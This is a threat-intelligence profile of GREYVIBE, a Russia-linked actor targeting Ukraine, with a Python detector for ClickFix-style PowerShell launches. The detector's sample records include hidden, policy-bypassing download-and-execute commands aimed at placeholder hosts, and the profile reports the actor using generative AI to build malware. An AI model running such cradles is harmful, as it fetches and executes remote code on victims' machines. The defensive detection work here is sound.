GREYVIBE
GREYVIBE is a previously undocumented, Russia-linked threat actor tracked by WithSecure and active since at least August 2025. The group has persistently targeted Ukraine and Ukraine-related entities across military, government, civilian, and business sectors. WithSecure assessed that GREYVIBE’s targeting, lures, and post-compromise objectives align with Russian state intelligence interests in the context of the Russia-Ukraine war, while also identifying ties to the broader cybercrime ecosystem. Researchers reported that the operators and developers are Russian-speaking and operate broadly in the Moscow time zone.

GREYVIBE uses multiple delivery vectors, including spear-phishing emails, fake CAPTCHA or verification pages, fraudulent Ukrainian adult-club websites, and charity-themed lure sites. Its activity has been grouped into five attack chains: PhantomMail, PhantomClick, PrincessClub, DroneLink, and Nebo. PhantomMail used spear-phishing emails linking to malicious ZIP or RAR archives hosted on services such as Google Drive and 4sync; these archives contained JavaScript-based or PyInstaller-based loaders that launched decoy documents and deployed PhantomRelay. PhantomClick used ClickFix-style fake CAPTCHA pages impersonating services such as Zoom and LAPAS and tricked victims into executing commands that installed PhantomRelay. PrincessClub used fake Ukrainian adult-club websites and fake female Telegram personas to target victims, including confirmed Ukrainian combatants in Kharkiv, delivering FallSpy on Android and PhantomRelayV1 or LegionRelay on Windows; later versions added WebRTC-based live call functionality to capture victim audio and video. DroneLink used websites masquerading as charitable foundations supporting the Armed Forces of Ukraine and delivered WireGuard together with LegionRelay. Nebo used FallSpy samples and fake Russian-language login interfaces.
Known GREYVIBE malware and tooling include PhantomRelay, LegionRelay, and FallSpy, as well as loaders and obfuscators such as DAYLIGHT, LOOKVALPS, LOOKVALJS, and TEASOUP. PhantomRelay is a modular PowerShell-based RAT using a two-stage execution chain and secure WebSocket communications. LegionRelay is a lightweight PowerShell-based RAT using REST API methods for file enumeration and exfiltration, screenshot capture, browser data theft, Telegram and WhatsApp data theft, messaging database enumeration, and RDP access setup. FallSpy is Android spyware that harvests contacts, call logs, installed applications, SIM-linked phone numbers, device and network information, Wi-Fi SSID, last-known location, public IP, and media files.

WithSecure found strong evidence that GREYVIBE systematically used generative AI platforms including ChatGPT, Google Gemini, and Ideogram AI across lure creation, image generation, malware and obfuscator development, backend infrastructure setup, and post-compromise command generation. Researchers assessed that this AI use helped the group accelerate development, compensate for capability gaps, and vary code structures.

At the same time, GREYVIBE was described as low-to-moderately sophisticated and prone to operational security mistakes, including exposing backend functionality through design flaws in LegionRelay, uploading test samples to VirusTotal, and leaving development artifacts such as "letsrollboyos," "totallyunsus," and "cuteuwu." WithSecure stated it had not identified definitive links between GREYVIBE and any previously tracked threat group, but assessed with moderate confidence that the actor has ties to the broader cybercrime ecosystem and with low-to-moderate confidence that it may involve current or former cybercriminals.
Reported indicators of this overlap include use of an ISO builder with suspected ties to TrickBot and UAC-0098, slang-based artifact naming, deployment of XMRig on a small number of infected machines, and appearance of PhantomRelay variants in unrelated cybercrime activity. Known aliases and campaign or sub-cluster names directly mentioned in the reporting are GREYVIBE, GreyVibe, PhantomMail, PhantomClick, PrincessClub, DroneLink, and Nebo.
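The PhantomClick chain above relies on a ClickFix-style page getting the victim to paste a command into the Run dialog, and PhantomRelay then talks to its backend over secure WebSockets. The following detection sketch is an added example for this profile (not WithSecure's or Mallory's tooling) that scores Sysmon-style process-creation records for that combination: PowerShell spawned from the shell, a hidden window, execution-policy bypass, an encoded or download-cradle command line, and a ws:// or wss:// URL. Field names follow Sysmon Event ID 1 conventions; the three sample records and the hostnames in them are constructed for illustration and are not GREYVIBE indicators.

```python
"""
Heuristic detector for ClickFix-style PowerShell launches.
Added example for this profile; field names are Sysmon Event ID 1 style
(Image, ParentImage, CommandLine, ProcessId) and all sample data is constructed.
"""
import base64
import json
import re

# Processes from which a user-pasted command typically originates (Run dialog,
# File Explorer, or an HTA/script host started by a lure page).
SHELL_PARENTS = {"explorer.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

HIDDEN = re.compile(r"-(?:w|win|window|windowstyle)\s+h(?:idden)?\b", re.I)
BYPASS = re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass\b", re.I)
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
CRADLE = re.compile(
    r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring"
    r"|net\.webclient|iex|invoke-expression)\b", re.I)
WEBSOCKET = re.compile(r"\bwss?://", re.I)


def decode_encoded(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or '' if absent/invalid."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(ev):
    """Score one process-creation record; returns (score, list_of_reasons)."""
    image = ev.get("Image", "").lower().rsplit("\\", 1)[-1]
    parent = ev.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    cmd = ev.get("CommandLine", "")
    if image not in ("powershell.exe", "pwsh.exe"):
        return 0, []
    # Inspect both the raw command line and any decoded -enc payload.
    text = cmd + " " + decode_encoded(cmd)
    reasons = []
    if parent in SHELL_PARENTS:
        reasons.append("parent " + parent)
    if HIDDEN.search(text):
        reasons.append("hidden window")
    if BYPASS.search(text):
        reasons.append("execution policy bypass")
    if ENCODED.search(cmd):
        reasons.append("encoded command")
    if CRADLE.search(text):
        reasons.append("download cradle")
    if WEBSOCKET.search(text):
        reasons.append("websocket url")
    return len(reasons), reasons


def score_line(line):
    """Score a single JSON-encoded record."""
    return score_event(json.loads(line))


def detect(lines, threshold=3):
    """Return [(ProcessId, score, reasons)] for records at or above threshold."""
    alerts = []
    for line in lines:
        ev = json.loads(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append((ev.get("ProcessId"), score, reasons))
    return alerts


# Constructed sample data: a pasted cradle, a benign scheduled script, and an
# encoded command that hides a WebSocket URL in its decoded body.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENC_PAYLOAD = "$c=New-Object Net.WebClient;iex $c.DownloadString('wss://c2.example.invalid/relay')"
ENC_SAMPLE = base64.b64encode(ENC_PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    json.dumps({"ProcessId": 4120, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": 'powershell.exe -w hidden -ep bypass -c "iwr http://verify.example.invalid/c | iex"'}),
    json.dumps({"ProcessId": 4188, "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
                "CommandLine": r"powershell.exe -File C:\scripts\nightly-backup.ps1"}),
    json.dumps({"ProcessId": 4302, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": "powershell.exe -enc " + ENC_SAMPLE}),
]

if __name__ == "__main__":
    for pid, score, reasons in detect(SAMPLE_EVENTS):
        print(pid, score, ", ".join(reasons))
```

The scoring is deliberately additive rather than a single signature, since the page notes that GREYVIBE varies its code structures with AI assistance; a threshold of three keeps an isolated `-ep bypass` from a legitimate admin script from alerting, while a shell-launched, hidden, cradle-bearing command still trips it even when the exact string changes.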
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- Government & Administration
- Military
Where they target
Geographies tied to known operations.
- 🇺🇦 Ukraine
Where they're from
Attributed origin per open-source reporting.
- RU
Tradecraft
34 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
6 malware families attributed to this actor across reporting.
1 additional family tracked in Mallory.
Observables
1 indicator attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
7 sources tracked across advisories, community write-ups, and news.
Cyber espionage operations targeting Ukrainian entities and Eastern Europe using multi-vector social engineering, phishing, fake verification pages, romance lures, and custom implants for intelligence collection.
Conducting AI-assisted attack campaigns against Ukrainian military, government, civilian, and business organizations using custom obfuscators, fake content, loaders, and malware across multiple parallel attack chains.
Russia-linked hybrid espionage/crime activity targeting Ukraine and Ukraine-related organizations using AI-assisted malware development and five distinct attack chains.
Conducting ongoing espionage-oriented attacks against Ukraine and Ukraine-related entities using spear-phishing, fake CAPTCHA pages, and fraudulent websites to deliver custom malware and RATs; assessed as a Russian-speaking group aligned with Kremlin state interests and with ties to the broader cybercrime ecosystem.